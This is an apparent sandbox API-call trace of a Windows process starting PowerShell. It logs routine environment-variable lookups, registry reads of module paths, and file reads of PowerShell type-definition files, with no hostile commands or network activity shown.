	[0549.827] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.827] CoTaskMemFree (pv=0x49d030) 
	[0549.827] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0549.827] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.827] CoTaskMemFree (pv=0x49d030) 
	[0559.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0559.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0559.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0559.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0561.157] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0561.157] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0561.157] CoTaskMemFree (pv=0x49d030) 
	[0561.159] CoTaskMemAlloc (cb=0xcc) returned 0x1b8e5620
	[0561.159] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8e5620, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerS") returned 0x76
	[0561.159] CoTaskMemFree (pv=0x1b8e5620) 
	[0561.159] CoTaskMemAlloc (cb=0xf0) returned 0x1b8e1340
	[0561.159] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8e1340, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0561.159] CoTaskMemFree (pv=0x1b8e1340) 
	[0561.159] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x28dac8 | out: phkResult=0x28dac8*=0x334) returned 0x0
	[0561.159] RegQueryValueExW (in: hKey=0x334, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x28da4c, lpData=0x0, lpcbData=0x28da48*=0x0 | out: lpType=0x28da4c*=0x2, lpData=0x0, lpcbData=0x28da48*=0x6c) returned 0x0
	[0561.159] CoTaskMemAlloc (cb=0x70) returned 0x4280e0
	[0561.159] RegQueryValueExW (in: hKey=0x334, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x28da1c, lpData=0x4280e0, lpcbData=0x28da18*=0x6c | out: lpType=0x28da1c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x28da18*=0x6c) returned 0x0
	[0561.159] CoTaskMemFree (pv=0x4280e0) 
	[0561.160] CoTaskMemAlloc (cb=0xcc) returned 0x1b8e5620
	[0561.160] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b8e5620, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0561.160] CoTaskMemFree (pv=0x1b8e5620) 
	[0561.160] CoTaskMemAlloc (cb=0xcc) returned 0x1b8e5620
	[0561.160] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8e5620, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0561.160] CoTaskMemFree (pv=0x1b8e5620) 
	[0561.163] RegCloseKey (hKey=0x334) returned 0x0
	[0561.163] CoTaskMemAlloc (cb=0xcc) returned 0x1b8e5620
	[0561.163] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8e5620, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0561.164] CoTaskMemFree (pv=0x1b8e5620) 
	[0561.164] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x28dac8 | out: phkResult=0x28dac8*=0x334) returned 0x0
	[0561.164] RegQueryValueExW (in: hKey=0x334, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x28da4c, lpData=0x0, lpcbData=0x28da48*=0x0 | out: lpType=0x28da4c*=0x0, lpData=0x0, lpcbData=0x28da48*=0x0) returned 0x2
	[0561.164] RegCloseKey (hKey=0x334) returned 0x0
	[0562.657] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0562.657] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0562.657] CoTaskMemFree (pv=0x49d030) 
	[0562.659] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0562.659] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0562.660] CoTaskMemFree (pv=0x49d030) 
	[0562.666] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0562.666] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0562.666] CoTaskMemFree (pv=0x49d030) 
	[0562.666] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0562.666] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0562.666] CoTaskMemFree (pv=0x49d030) 
	[0562.668] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d8b8 | out: phkResult=0x28d8b8*=0x334) returned 0x0
	[0562.669] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0x28d8cc, lpData=0x0, lpcbData=0x28d8c8*=0x0 | out: lpType=0x28d8cc*=0x1, lpData=0x0, lpcbData=0x28d8c8*=0x74) returned 0x0
	[0562.669] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0x28d83c, lpData=0x0, lpcbData=0x28d838*=0x0 | out: lpType=0x28d83c*=0x1, lpData=0x0, lpcbData=0x28d838*=0x74) returned 0x0
	[0562.669] CoTaskMemAlloc (cb=0x78) returned 0x4280e0
	[0562.669] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0x28d80c, lpData=0x4280e0, lpcbData=0x28d808*=0x74 | out: lpType=0x28d80c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x28d808*=0x74) returned 0x0
	[0562.669] CoTaskMemFree (pv=0x4280e0) 
	[0562.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x28d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0562.669] SetErrorMode (uMode=0x1) returned 0x1
	[0562.669] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x28d790 | out: lpFileInformation=0x28d790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0562.669] SetErrorMode (uMode=0x1) returned 0x1
	[0562.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0562.672] SetErrorMode (uMode=0x1) returned 0x1
	[0562.672] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d790 | out: lpFileInformation=0x28d790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0562.672] SetErrorMode (uMode=0x1) returned 0x1
	[0562.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0562.676] SetErrorMode (uMode=0x1) returned 0x1
	[0562.676] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d790 | out: lpFileInformation=0x28d790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0562.677] SetErrorMode (uMode=0x1) returned 0x1
	[0562.681] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0562.681] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0562.681] CoTaskMemFree (pv=0x49d030) 
	[0562.689] CoTaskMemAlloc (cb=0x104) returned 0x49d030
	[0562.689] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d030, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0562.689] CoTaskMemFree (pv=0x49d030) 
	[0562.690] GetACP () returned 0x4e4
	[0564.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0564.144] SetErrorMode (uMode=0x1) returned 0x1
	[0564.144] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x33c
	[0564.144] GetFileType (hFile=0x33c) returned 0x1
	[0564.144] SetErrorMode (uMode=0x1) returned 0x1
	[0564.144] GetFileType (hFile=0x33c) returned 0x1
	[0564.146] ReadFile (in: hFile=0x33c, lpBuffer=0x2ebf1c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2ebf1c0*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0564.147] ReadFile (in: hFile=0x33c, lpBuffer=0x2ebf1c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2ebf1c0*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0564.148] ReadFile (in: hFile=0x33c, lpBuffer=0x2ebf1c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2ebf1c0*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0564.149] ReadFile (in: hFile=0x33c, lpBuffer=0x2ebf1c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2ebf1c0*, lpNumberOfBytesRead=0x28d6c8*=0xcf3, lpOverlapped=0x0) returned 1
	[0564.149] ReadFile (in: hFile=0x33c, lpBuffer=0x2ebe61b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2ebe61b*, lpNumberOfBytesRead=0x28d6c8*=0x0, lpOverlapped=0x0) returned 1
	[0564.149] ReadFile (in: hFile=0x33c, lpBuffer=0x2ebf1c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2ebf1c0*, lpNumberOfBytesRead=0x28d6c8*=0x0, lpOverlapped=0x0) returned 1
	[0564.151] CloseHandle (hObject=0x33c) returned 1
	[0564.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0564.156] SetErrorMode (uMode=0x1) returned 0x1
	[0564.156] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d640 | out: lpFileInformation=0x28d640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0564.156] SetErrorMode (uMode=0x1) returned 0x1
	[0564.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0564.158] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d728 | out: phkResult=0x28d728*=0x33c) returned 0x0
	[0564.158] RegQueryValueExW (in: hKey=0x33c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d6ac, lpData=0x0, lpcbData=0x28d6a8*=0x0 | out: lpType=0x28d6ac*=0x1, lpData=0x0, lpcbData=0x28d6a8*=0x56) returned 0x0
	[0564.159] CoTaskMemAlloc (cb=0x5a) returned 0x1b8ed5b0
	[0564.159] RegQueryValueExW (in: hKey=0x33c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d67c, lpData=0x1b8ed5b0, lpcbData=0x28d678*=0x56 | out: lpType=0x28d67c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d678*=0x56) returned 0x0
	[0564.159] CoTaskMemFree (pv=0x1b8ed5b0) 
	[0564.159] RegCloseKey (hKey=0x33c) returned 0x0
	[0564.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0564.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0566.738] GetSystemInfo (in: lpSystemInfo=0x28c360 | out: lpSystemInfo=0x28c360*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0566.740] VirtualQuery (in: lpAddress=0x28c410, lpBuffer=0x28d2d0, dwLength=0x30 | out: lpBuffer=0x28d2d0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0566.761] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0566.761] GetFileType (hFile=0x334) returned 0x1
	[0566.761] SetErrorMode (uMode=0x1) returned 0x1
	[0566.761] GetFileType (hFile=0x334) returned 0x1
	[0566.761] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.761] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.762] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.762] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.762] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.762] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.762] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.762] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.763] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.764] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.764] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
	[0566.765] ReadFile (in: hFile=0x334, lpBuffer=0x2d91b10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d6c8, lpOverlapped=0x0 | out: lpBuffer=0x2d91b10*, lpNumberOfBytesRead=0x28d6c8*=0x1000, lpOverlapped=0x0) returned 1
